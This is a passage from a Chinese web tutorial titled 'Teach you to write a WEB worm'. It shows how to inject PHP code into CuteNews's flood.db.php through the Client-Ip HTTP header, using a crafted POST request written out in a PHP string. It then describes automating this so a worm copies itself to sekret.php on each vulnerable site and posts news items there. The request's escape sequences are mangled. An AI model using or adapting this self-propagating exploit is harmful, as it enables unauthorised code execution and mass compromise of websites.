教你编写WEB蠕虫
2009-06-12 16:54:59 来源:WEB开发网接下来的工作就仅仅只是构造一个适合的HTTP request,以利用漏洞,并进行自我复制以感染系统。当有人对文章发表评论时,CuteNews便将信息写入data/flood.db.php文件中。通过Client-Ip HTTP header传输数据,你就可以向这个文件注入PHP代码。
$packet = str_replace("n","nr",
"POST
$location/example2.php?subaction=showcomments&id=1128188313&archive=&start_from=
&ucat=& HTTP/1.1
Accept: */*rnAccept-Language: en
Accept-Encoding: gzip, deflate
Client-Ip:
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6
(KHTML, like Gecko) Safari/412.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: close
Host: $domain
name=haxitup&mail=&comments=j00+haxed+%3Alaughing%3A&submit=Add+My+Comment&
subaction=addcomment&ucat=&show=
";
如果我们创建了这些请求,那么就可以通过Client-Ip将PHP代码写入到flood.db.php文件中,然后我们就可以通过一个正规的GET请求来执行代码了。既然可以将PHP代码执行的过程自动化,那么我们就可以开始着手准备去如何编写病毒代码,以实现其自我繁殖并植入payload的功能。下面的例子将复制整个蠕虫代码到漏洞服务器上的sekret.php文件中,以备运行。你可以在Client-Ip未端添加一些payload,通过运行sekret.php使其在news.txt顶端中添加一新标题,让每个存在漏洞的CuteNews站点都发表一新闻帖。
- ››编写Linux定时处理程序
- ››web安全之信息刺探防范1
- ››webqq 最新加密算法
- ››webdriver 数据库验证方法
- ››WebSphere Application Server 7.0 XML Feature P...
- ››Web2.0网络时代基于社会影响力的声望值
- ››Web服务器搭建:配置Linux+Apache+Mysql+PHP(或Pe...
- ››编写Linux系统下Daemon程序的方法步骤
- ››WebLogic调整Java虚拟机性能优化参数
- ››webqq2.0协议研究(3)-ClientId生成
- ››Web.config配置文件
- ››WebBrowser组件的execWB方法——Delphi控制浏览器...
更多精彩
赞助商链接